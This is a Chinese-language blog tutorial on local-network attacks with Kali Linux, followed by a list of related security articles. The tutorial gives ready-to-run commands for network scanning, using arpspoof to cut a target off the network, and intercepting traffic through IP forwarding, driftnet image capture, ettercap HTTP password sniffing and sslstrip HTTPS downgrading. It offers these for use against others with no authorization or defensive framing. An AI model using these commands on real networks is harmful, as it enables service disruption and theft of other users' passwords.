一篇文章带你了解kali局域网攻击
前言
很久以前的博客才发现,发布一下。
这个系列以后有时间再做。
arp攻击
arp路由链表,感兴趣的自行百度,我的博客我的笔记.
路由指向
介绍两个东西.
echo 0 >/proc/sys/net/ipv4/ip_forward #让经过的数据不留通 echo 1 >/proc/sys/net/ipv4/ip_forward #让数据流通
内网扫描
这个在百度上你可以看到很多相关的方式,比如nmap fping
但是基本上扫描结果不太号,在虚拟机上你会发现你把主机的防火墙关了都扫不到主机.
这里使用netdiscover
当然这里也写几个nmap之类的指令
nmap -PR -sL ip fping -asg ip netdiscover -i kali网卡 -r ip(网段) netdiscover -i eth0 -r 192.168.43.1/30
扫描速度是比较慢的
断网攻击
arpspoof -i kali的网卡 -t 目标地址 目标网卡 arpspoof -i eth0 -t 192.168.43.7 192.168.43.1
arp欺骗信息获取
1.arpspoof -i eth0 -t 192.168.43.7 192.168.43.1
开始欺骗让数据经过你的电脑
2.echo 1 >/proc/sys/net/ipv4/ip_forward
放掉数据包
获取图片
使用工具difinet
difinet -i eth0(网卡)
实际操作:
图片会在那里临时保存
由于网络问题可能会有点卡
获取HTTP连接的密码信息
使用ettercap
其他的操作还是一样的,要开启arp欺骗
ettercap -Tq -i eth0
-T 文本模式 q 安静模式 i 网卡
然后等待即可.不过现在都是https,作用不大
出现中文怎么办,直接赋值中文乱码,之后解码即可
百度搜索url解码
或者直接使用python
中文编码 from urllib.parse import quote,unquote str1 = '中国' str2=quote(strl) print(str2) 解码 print(unquote(str2))
获取HTTPS的密码信息
这个要先修改以下ettercap的配置文件.
vim /etc/ettercap/etter.conf
使用工具 sslstrip
那个吐槽一下 kali 2020是没有sslstrip的原因是没有安装python2的pip 只有pip3
记住一定要先安装python2
在kali里面python 默认为python2 当然你可以用ln -s 修改一下.
apt install python 这个时候会自动安装python 2.7
然后输入以下指令安装sslstrip
git clone https://github.com/moxie0/sslstrip.git cd sslstrip python setup.py install
这个是python2的,如果没猜错可能会遇到OpenSSL报错说没有这个模块
pip install pyOpenSSL
总结
本篇文章就到这里了,希望能给你带来帮助,也希望您能够多多关注猪先飞的更多内容!
相关文章
- 这篇文章主要给大家介绍了kali的局域网攻击,小编觉得这篇文章还是不错的,使用起来也是非常方便的,需要的朋友可以参考下...2021-08-20
- 现在有很多php开发框架都提供关于防XSS攻击的过滤方法,下面和大家分享一个预防XSS攻击和ajax跨域攻击的函数,摘自某开发框架,相比于仅仅使用内置函数应该还是够强了的吧...2016-11-25
- 这篇文章主要给大家分享了Nginx防止流量攻击的配置方法,文中给出了详细的介绍和配置示例代码,对大家具有一定的参考学习价值,需要的朋友们下面来一起看看吧。...2017-07-06
- 你的网站是不是常常被黑,或者一不注意就成了黑客的“肉鸡”?对于Web网站服务器来说,如果不进行安全设置,很容易被黑客“盯上”,随时都有被入侵的危险。...2016-01-27
- 这篇文章主要给大家介绍了关于ASP.NET Core中如何利用Csp标头对抗Xss攻击的相关资料,文中通过示例代码介绍的非常详细,对大家学习或者使用ASP.NET Core具有一定的参考学习价值,需要的朋友们下面来一起学习学习吧...2021-09-22
- CC攻击就是对方利用程序或一些代理对您的网站进行不间断的访问,造成您的网站处理不了而处于当机状态,下面我们来总结一些防CC攻击的php实例代码,各位朋友可参考。 ...2016-11-25
- 这篇文章主要介绍了Unity实现攻击范围检测并绘制检测区域,文中示例代码介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们可以参考一下...2020-06-25
- PHP木马其实就是利用php程序写的一个php文件他可以对文件进行任何的读写操作,同时可以上传下载数据库等等,说得好听点就是一个完美的网站文件管理系统了,下面小编总结了...2016-11-25
- Linux Nginx VPS下简单解决CC攻击,使用Nginx与php的朋友可以参考下。...2016-01-27
- 最近网站经常被攻击,后来想到了一个利用php来防止网站受攻击的办法,下面是我的代码,代码不是最好的,根据自己的需求来做,下面来看看我的代码。 /* *网站防ip攻击代码...2016-11-25
- 这篇文章主要介绍了Nginx服务器抵御CC攻击的相关配置讲解,CC攻击原理与DDoS基本相似而且技术含量低,注意防范即可,需要的朋友可以参考下...2016-01-27
- <!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1...2016-11-25
- 作者总结了关于在CC脚本攻击的一些问题及防CC脚本攻击的一些解决方案,有需要的朋友可参考一下。 1,登录进VPS控制面板,准备好随时重启VPS。 2,关闭Web Server先,过高...2016-11-25
- 这篇文章主要介绍了Yii框架防止sql注入,xss攻击与csrf攻击的方法,结合实例形式分析了Yii框架针对sql注入,xss攻击与csrf攻击的防范方法与相关函数调用注意事项,需要的朋友可以参考下...2016-10-20
- CC主要是用来攻击页面的.大家都有这样的经历,就是在访问论坛时,如果这个论坛比较大,访问的人比较多,打开页面的速度会比较慢...2016-01-27
- 世界上最安全的计算机无法使用谷歌搜索,因为它们未与互联网及其他所有网络相连接。美国军方和美国国家安全局(NSA)依靠这种被称作“隔离网闸”(air-gapping,一种通过专用硬件使两个或者两个以上的网络在不连通的情况下,实现安全地数据传输和资源共享的技术)的方法来预防黑客袭击,新闻调查网站The Intercept也是如此。这个网站的创办人之一格伦·格林沃尔德(Glenn Greenwald)在披露美国国家安全局的大规模国内监听活动上起了不小的作用。...2016-11-01
- 由于众所周知的原因,微软的产品总能吸引黑客们的目光,IIS也不例外。IIS是什么?即因特网信息服务,作为当今流行的Web服务器之一,它提供了强大的Internet和Intranet服务功能。...2016-01-27
- 很多情况下,我们使用服务器最重要的就是服务器安全设置,要不你的网站数据很容易就被别人复制走,服务器变成肉鸡,让你损失惨重,这里简单分享下,随时是2000的安全设置,但可以参考下...2016-01-27
- 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令,那么在ASP.NET中如何防范SQL注入式攻击,下文为大家揭晓...2021-09-22
- 今天自己的一台机器突然向外部发送大量数据包,可每秒到1G以上,虽然我用策略把UDP禁止包是发不出去但是很占cup啊,所以想到最后还是想办法解决了。 先看源码 ...2016-11-25